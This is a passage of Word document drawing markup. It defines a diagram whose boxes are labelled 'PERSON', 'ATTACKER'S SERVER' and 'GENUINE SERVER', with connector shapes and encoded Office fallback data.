                        <wps:cNvPr id="1551" name="Shape 1551"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="206593" y="0"/>
                            <a:ext cx="696827" cy="593992"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="696827" h="593992">
                                <a:moveTo>
                                  <a:pt x="696827" y="593992"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="329496" y="593992"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="329496" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="175524"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="11624" cap="rnd">
                            <a:round/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="4672C4"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1552" name="Shape 1552"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="161977" y="165295"/>
                            <a:ext cx="89231" cy="81833"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="89231" h="81833">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="89231" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="44616" y="81833"/>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553" name="Shape 1553"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="206593" y="1465427"/>
                            <a:ext cx="591803" cy="1005852"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="591803" h="1005852">
                                <a:moveTo>
                                  <a:pt x="0" y="758728"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1005852"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="310598" y="1005852"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="310598" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="591803" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="11624" cap="rnd">
                            <a:round/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="4672C4"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1554" name="Shape 1554"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="787242" y="1424510"/>
                            <a:ext cx="89231" cy="81834"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="89231" h="81834">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="89231" y="40917"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="81834"/>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556" name="Rectangle 1556"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm rot="-5399999">
                            <a:off x="47610" y="1137830"/>
                            <a:ext cx="413958" cy="137363"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3347FA41" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>PERSON</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="7533C46A" id="Group 40470" o:spid="_x0000_s1093" style="width:400.3pt;height:194.6pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="50838,24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g+EQwAAPl5AAAOAAAAZHJzL2Uyb0RvYy54bWzsXdtu4zgSfV9g/sHw+3RE3RV0erDo6TQW&#10;WOwMZmY/QHHs2IBteWR1kt6v31MkiyJtJZGStJ1YSoDIoSmKt1OnqlikPv5yv1qObqfldlGsL8bi&#10;gzceTdeT4nqxvrkY//evy5/T8Whb5evrfFmspxfj79Pt+JdPP/3j493mfOoX82J5PS1HKGS9Pb/b&#10;XIznVbU5PzvbTubTVb79UGyma3w5K8pVXuHf8ubsuszvUPpqeeZ7Xnx2V5TXm7KYTLdbpP6qvhx/&#10;kuXPZtNJ9dtstp1Wo+XFGHWr5N9S/r2iv2efPubnN2W+mS8muhr5M2qxyhdrPNQU9Wte5aNv5WKv&#10;qNViUhbbYlZ9mBSrs2I2W0ymsg1ojfB2WvO1LL5tZFtuzu9uNqab0LU7/fTsYif/uf1abv7c/F6i&#10;J+42N+gL+R+15X5WruiKWo7uZZd9N102va9GEyRGXhqkGQZ5gu/8MBF+kqlOnczR83v3TeZfnrjz&#10;jB985lTnboMJsq37YPuyPvhznm+msmu35+iD38vR4vpiHGaxh7as8xWmqswyUkmyc2RO01Xb8y16&#10;raGfwiCOAl+MR+gR4Ys0EHqacZ8lIo2SRHVZ4Gd4AvWYaXd+Pvm2rb5OC9n5+e2/t5Wapdf8KZ/z&#10;p8n9mj+WmOuPzvJNXtF9VGP6OLq7GHNN5hdjXRH6dlXcTv8qZL5qZwBRyfrb5drOxWXxHEFWzsDX&#10;jSzOyui0nnPxVeUGaFFi64yyq82j8YGaKjvXNB+Jdgcv19QTeMwkh/yZLfNKAnm1qCCYlosVDWLi&#10;eXXBKI0moxp9+an6vpxSdy3Xf0xnmEgSLJSwLW+uPi/L0W1O4kf+yMLz5Wae61Q99jqrrKosh+6f&#10;LZZLU6SQtzpFXl5SmboEnZnum0rJZ+701J0TXRsl/iBE0GgWgugUc5N8crGuzP1riG75EKu19PGq&#10;uP4uBYfsEKCTRMgBYCoiNNpBqUwZQOripAVSW+DKgivPNEYoX22k7uaZLIvtVIm3llD0My/WaNz+&#10;/RpYbADO55R+NXCa4aZB8zwE9wqLAWPxD1BQvr5ZTkfAY0C9S+IA9NqCNMMkSZNIk2Ya+15C90Mq&#10;sbqQeCIDqZKeIfwoQ141q1hL2ZSKNEf04WJMdKhkrSZQ4gKdhcpdrunvuriEiFUFUcqOZK/ur+6l&#10;YhDIaV3LvNG8KP/3G/Te2bIAe4Aw5acxqcJ4OH07Hi3/tYaWAklV8YeSP1zxh7Jafi6kbqqq889v&#10;VTFbEOHLqigJq/85qIDFUCg1yBlU2entBxVI9gL/4UENgkTgQUcaU8EzVPXy6Y8pdM6GMZVA6zCm&#10;gQhS1m4bgJpmYUra1HFw6vdtTLPGMZU2WPsxjRIhYo3TAKIVgtYRviEslhhiXg1qHMSyfEjUwwhf&#10;QyW9ACpZnGZUayO025AGURAEIYvewQitjdF3YIS+jtr7IgW2WSdu0KTDOPE/h1oX65PaK8CBtqNI&#10;REiB1GwtdU8Uoo5JOZigyh3UAJzBBJUe/k6e62avLZAXMhZtawWpnfCYeH4UMWU2aLZRGIpaCzq4&#10;CWpa0wstCIMKL9C+uYLUboMapB7rQW9QtTUGdS8GFaotFkMc2lRJXYY0TeIwgTECAxNrJ9rRVDuK&#10;hO9nIiQPIlmgXgDTZddasd3/P3R9xdQFCyxcFfLz1LTY5Dqtv3UdrKY0NGzXzfpwTn4uuhgGG+fj&#10;q/389jndp5Nnrdsqy3tScHu7xiJ2VkIhkaXHvLWCe7JAdYHSBq7uHQw+vioQtoc3RGiDCBhWWk57&#10;1ZOYcsfmVEldyDPzglDAu4T5E/qZD0cT7n6APB1Ljj19R+FOXZNDU6fTAQxWvtrM2Tpjn4izt54h&#10;iv1xPUNIGUDaLjjBZsEWsLKzu+CqdV0bqbt5BtI8bdIUkd/oG0JqF0QKRGeKWIUnRHD0CrkkVfNm&#10;GnowOo+2QGZ8Ir3xIsBNZ4tYUoTM0m+rgBMMoUgimDjkJQgQSZxJ0VAPKcc9kRvBEUQH14S4JkOU&#10;JsUVUJTmu/IffLnED0kb+En6tEDmG/+tWsSGKDZyqs8QdYTJQ84Dxvyu8GHrg69Kt7Fy7yo4bsbB&#10;cyADsnuGRWJHE6RpIkqUDtPamyf8NAwD5TpABFjggTwd30FIjMp+d7joQ46vPThhck3I664q8nzP&#10;AZcFID4OLSujfqgS+QxAvtrWSOuM7qNP2+HeW78BRcruL3gitZOlAnoRHJ8Z+mHg7wRSh34qYr1h&#10;S/gHj+Uz0aa9MFUEwvB4UFkLQkqXAY2BBwqShgDyfdih2KDmiF2RhAiH18GZLCcOLnK5Fs8XtFzC&#10;/tJGe3GHzYdsIpTraxn+jy2U62uWxDqQ/vGtWw2xOnrrFheDjVHUTq3Mv8KGrz6ZBYHxxxhAdPPF&#10;2IAIIi+Uc7622808IsN9wMOAh9nb3soY7JnJSHkuQTTggSYAkCCyJM7A+0qGHZYfSA/Xj38+PyjT&#10;lcthUUw7kAd+2J7Q1t7A7FIy/GB0xlZuIx8HEgS0jZ80pgEQvOsfKLHX7tW290FhIj3ujROE2Qxk&#10;BzfDE9OFJLDckcIalKAI/CAJdnZ4pWGGoyp4Aevgsc2Sl8gV1ROrEEqrs34lIqXGtvfGhRliypQ3&#10;LsPuPRiAmA61FuyHHvZg43vifj9KMjVfIAQOS/3YHG2qAjVA16RJCzDZqMJ0kAzrKg+5yO0bWM9n&#10;JxtfbWdbmzxOT6lC2msXtIeS1oBpheqVzc/LL5dftOrWvDPrRZu9+mR+hnvBOUjpJEnDMGZJSsf7&#10;IKLOhV6a+ZCuEngpNl5K4/YYuNP1AOpUNZpAp5RqRsZDSNMlAZick/HFV4Uz9Iz2VNkN5zx8fQyT&#10;3cNxyLx5GeBeBJ1mNDa6kCwM9wpwxqvN+jy243QDHKiOCBPzDzyZpDge5hGuI+o42oYPw0nEdaom&#10;z4edarIuBi2GEGEM8VVhyTyVqZPbz9n4up89EbHHJ6moXAPfnZ+SOR3urT8gpQv8YDdAe0QpD8Hv&#10;PfEdMRT8bRaTPc15bbns6Xz7T2dgDrx3ckfUhXvrHEjpAjxBJt5jvAc7PpAKF9l4UeohyoMecAxd&#10;01QFvKdr0sR7JlsLANp5ncYxZvhq65PtM3rYX8zd9WaIz9lr2Kxavkhb7ZXeaU4wM3qn2Wzdyo8s&#10;bEMvS0WAE5IAr9rH8t6ITwURsAl3aOJzn87gPV3ic7DcK+DtLWhiN35n4tO+zSSJcSqHizvDDMR7&#10;YYj9/nKB6Ni8p2vyFO85FX4IhKaJFlEyZPhq8x6Dmr/jq51HeCJVwWDGkHwDtp4Dk4HyWp0LLwkN&#10;CrNeLdCHl5NvZG9VodvSqU15aZzE/uDaPFcQGlyb+mDzBtemA+FeMR0WTO1daECgWchspWJaHj55&#10;Y61bcjS5Dt3B0VRH4ziuCkw7RN/ImjRxnGoLE9FDxMaFPclrVkZ+qrJtmdr46lCcrt/TObmeXMrp&#10;6qG9DacPTdyEMQC7xUycHjpdJLXAqHsDg4Wvmhr1vp8nIe1KCC6kO/Ief0GAessGS4DnRnwPpzO+&#10;3umM0d6SO1K6GIS+F8sdDjzDapqkkFYwo1xsR5Ysky6aY1iCXBNygKqKNJEk50JLnOo+BEW9V5QW&#10;LJz8DB6+KiRauXf5zc3YjMSmPNgjTycoMJy6hdv+sIAYh9MGo/FFRiOdeOoqsUjpgk740aF2qfXB&#10;OPKzHW/NjpdUWpTHAKiuB/BJC3WBXG+qYWdrkYyd+lsXGboklkbGm1Ivz2tiNIuN6ok2iHbzNiOy&#10;OzeinHcRDuMguE82Y7S3Ho+ULnCzyBDHnEbh7v5OvLwhRUia2vThYZe2gvMxIMdVIctR16SJFNXc&#10;x2EsyZMxnyorF/YYoPDWvYjeSwiUdszO8GfQ81WBmtu0h350cMtTUAdapFnwxqPuo73le6R0wSle&#10;Z+XzwdOIF4123wK5w4usYx08PNvlxfBVeJFOw2J/FcOHrzbTPh0yM/Ci2mtsXs7o7DY+oW1fkVk1&#10;tHe5IPVJzI3KAq9c+zmC9YcfOX/1G2vDRB43ThQgggRHllBhtfEIF2NGJ4BJHyu2xOBsf8UojEF+&#10;X9yPeaWccUYde88L3jQn3y8sQ4f0u5DpBcb2/9KPUr+x+dP/AQAA//8DAFBLAwQUAAYACAAAACEA&#10;PSUa19wAAAAFAQAADwAAAGRycy9kb3ducmV2LnhtbEyPQUvDQBCF74L/YRnBm92kRUljNqUU9VQE&#10;W0F6mybTJDQ7G7LbJP33jl708mB4w3vfy1aTbdVAvW8cG4hnESjiwpUNVwY+968PCSgfkEtsHZOB&#10;K3lY5bc3GaalG/mDhl2olISwT9FAHUKXau2Lmiz6meuIxTu53mKQs6902eMo4bbV8yh60hYbloYa&#10;O9rUVJx3F2vgbcRxvYhfhu35tLke9o/vX9uYjLm/m9bPoAJN4e8ZfvAFHXJhOroLl161BmRI+FXx&#10;EmkCdTSwSJZz0Hmm/9Pn3wAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQB&#10;AAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCTJOg+EQwAAPl5&#10;AAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQA9JRrX3AAA&#10;AAUBAAAPAAAAAAAAAAAAAAAAAGsOAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAdA8A&#10;AAAA&#10;">
                <v:shape id="Shape 49608" o:spid="_x0000_s1094" style="position:absolute;left:43653;top:12183;width:7185;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JZxAAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/NaoNA&#10;EL4H+g7LFHpL1rYSrM0qiVTIpYcaH2Bwpyp1Z8Xdqs3Tdw+BHD++/0O+mkHMNLnesoLnXQSCuLG6&#10;51ZBfSm3CQjnkTUOlknBHznIs4fNAVNtF/6iufKtCCHsUlTQeT+mUrqmI4NuZ0fiwH3byaAPcGql&#10;nnAJ4WaQL1G0lwZ7Dg0djlR01PxUv0bBtS7ioYxfr6ek1+fPsqyPp+JDqafH9fgOwtPq7+Kb+6wV&#10;xG/7KOwNd8IVkNk/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAPApklnEAAAA3gAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,l718577,r,329496l,329496,,e" fillcolor="red" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,718577,329496"/>
                </v:shape>
                <v:shape id="Shape 1500" o:spid="_x0000_s1095" style="position:absolute;left:43653;top:12183;width:7185;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24xQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawJB&#10;DMXvhX6HIQVvddYWRbaOIi2KFC+60nPYyf7BncwyM+r67ZuD4C3hvbz3y2I1uE5dKcTWs4HJOANF&#10;XHrbcm3gVGze56BiQrbYeSYDd4qwWr6+LDC3/sYHuh5TrSSEY44GmpT6XOtYNuQwjn1PLFrlg8Mk&#10;a6i1DXiTcNfpjyybaYctS0ODPX03VJ6PF2dgX3yGn+q33v9RPFSXe7ENm/PWmNHbsP4ClWhIT/Pj&#10;emcFf5oJv3wjI+jlPwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQACRY24xQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m,329496r718577,l718577,,,,,329496xe" filled="f" strokecolor="#c8c8c8" strokeweight=".08072mm">
                  <v:stroke miterlimit="83231f" joinstyle="miter" endcap="square"/>
                  <v:path arrowok="t" textboxrect="0,0,718577,329496"/>
                </v:shape>
                <v:rect id="Rectangle 1503" o:spid="_x0000_s1096" style="position:absolute;left:44778;top:12862;width:5702;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FA48BF3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="FEFFFF"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>ATTACKER</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1505" o:spid="_x0000_s1097" style="position:absolute;left:49060;top:12862;width:337;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60CB8B01" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="FEFFFF"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1507" o:spid="_x0000_s1098" style="position:absolute;left:49313;top:12862;width:895;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59A9A3A0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="FEFFFF"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t xml:space="preserve">S </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1509" o:spid="_x0000_s1099" style="position:absolute;left:45711;top:13975;width:4186;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33F5C328" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="FEFFFF"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>SERVER</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 49609" o:spid="_x0000_s1100" style="position:absolute;left:35333;top:12183;width:7186;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M2xgAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8oTe6sa2iImuYguFoheNIh4f2WcSzb4Nu6tJ/31XKPQ4zMw3zHzZm0bcyfnasoLxKAFB&#10;XFhdc6ngsP96mYLwAVljY5kU/JCH5WLwNMdM2453dM9DKSKEfYYKqhDaTEpfVGTQj2xLHL2zdQZD&#10;lK6U2mEX4aaRr0kykQZrjgsVtvRZUXHNb0ZB2h3N+pZfPuybPTXmunXrTdgo9TzsVzMQgfrwH/5r&#10;f2sF7+kkSeFxJ14BufgFAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA6iDDNsYAAADeAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m,l718577,r,329496l,329496,,e" fillcolor="#4672c4" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter" endcap="square"/>
                  <v:path arrowok="t" textboxrect="0,0,718577,329496"/>
                </v:shape>
                <v:shape id="Shape 1511" o:spid="_x0000_s1101" style="position:absolute;left:35333;top:12183;width:7186;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7+wQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Li8Iw&#10;EL4v+B/CCN7WtCsrSzWKuCiyeNEunodm+sBmUpKo9d8bQfA2H99z5svetOJKzjeWFaTjBARxYXXD&#10;lYL/fPP5A8IHZI2tZVJwJw/LxeBjjpm2Nz7Q9RgqEUPYZ6igDqHLpPRFTQb92HbEkSutMxgidJXU&#10;Dm8x3LTyK0mm0mDDsaHGjtY1FefjxSjY5xP3W/5V+xP5Q3m551u3OW+VGg371QxEoD68xS/3Tsf5&#10;32kKz2/iCXLxAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAOjQvv7BAAAA3QAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m,329496r718577,l718577,,,,,329496xe" filled="f" strokecolor="#c8c8c8" strokeweight=".08072mm">
                  <v:stroke miterlimit="83231f" joinstyle="miter" endcap="square"/>
                  <v:path arrowok="t" textboxrect="0,0,718577,329496"/>
                </v:shape>
                <v:rect id="Rectangle 1514" o:spid="_x0000_s1102" style="position:absolute;left:37025;top:12862;width:5442;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7494FC57" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="FEFFFF"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t xml:space="preserve">GENUINE </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1516" o:spid="_x0000_s1103" style="position:absolute;left:37380;top:13975;width:4186;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596215F3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="FEFFFF"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>SERVER</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 49610" o:spid="_x0000_s1104" style="position:absolute;left:8764;top:9495;width:12292;height:10318;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1229146,103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GzxgAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NasJA&#10;FIX3Qt9huIXudBIrUmMmQQul7krTCrq7Zq5JSOZOyEw1efvOotDl4fzxpfloOnGjwTWWFcSLCARx&#10;aXXDlYLvr7f5CwjnkTV2lknBRA7y7GGWYqLtnT/pVvhKhBF2CSqove8TKV1Zk0G3sD1x8K52MOiD&#10;HCqpB7yHcdPJZRStpcGGw0ONPb3WVLbFj1FwLHZn+dFPz+1pquJNeRnle7NX6ulx3G1BeBr9f/iv&#10;fdAKVpt1HAACTkABmf0CAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAMKjxs8YAAADeAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m,l1229146,r,1031859l,1031859,,e" fillcolor="red" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter" endcap="square"/>
                  <v:path arrowok="t" textboxrect="0,0,1229146,1031859"/>
                </v:shape>
                <v:shape id="Shape 1518" o:spid="_x0000_s1105" style="position:absolute;left:8764;top:9495;width:12292;height:10318;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1229146,103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kXxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;EIXvhf6HZQq9FN0o1EjqKlVQSm/aaultyE6T0OxsyGw1/fedQ8HbDO/Ne98sVkNozZl6aSI7mIwz&#10;MMRl9A1XDt7ftqM5GEnIHtvI5OCXBFbL25sFFj5eeE/nQ6qMhrAU6KBOqSuslbKmgDKOHbFqX7EP&#10;mHTtK+t7vGh4aO00y2Y2YMPaUGNHm5rK78NPcICn3VZe12H/8bALspZj/jmzuXP3d8PzE5hEQ7qa&#10;/69fvOI/ThRXv9ER7PIPAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAj7Z5F8YAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m,1031859r1229146,l1229146,,,,,1031859xe" filled="f" strokecolor="#c8c8c8" strokeweight=".08072mm">
                  <v:stroke miterlimit="83231f" joinstyle="miter" endcap="square"/>
                  <v:path arrowok="t" textboxrect="0,0,1229146,1031859"/>
                </v:shape>
                <v:shape id="Shape 49611" o:spid="_x0000_s1106" style="position:absolute;left:9034;top:4292;width:12291;height:3295;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1229146,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0ysyAAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NasMw&#10;EITvhb6D2EJvtexQTONGCWmhpA30kJ/eF2tjm1grI6mOnaePAoEch5n5hpktBtOKnpxvLCvIkhQE&#10;cWl1w5WC/e7r5Q2ED8gaW8ukYCQPi/njwwwLbU+8oX4bKhEh7AtUUIfQFVL6siaDPrEdcfQO1hkM&#10;UbpKaoenCDetnKRpLg02HBdq7OizpvK4/TcKzlnpftfDcnre78Yx739WH3+TlVLPT8PyHUSgIdzD&#10;t/a3VvA6zbMMrnfiFZDzCwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDNS0ysyAAAAN4A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" path="m,l1229146,r,329496l,329496,,e" fillcolor="#4672c4" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter" endcap="square"/>
                  <v:path arrowok="t" textboxrect="0,0,1229146,329496"/>
                </v:shape>
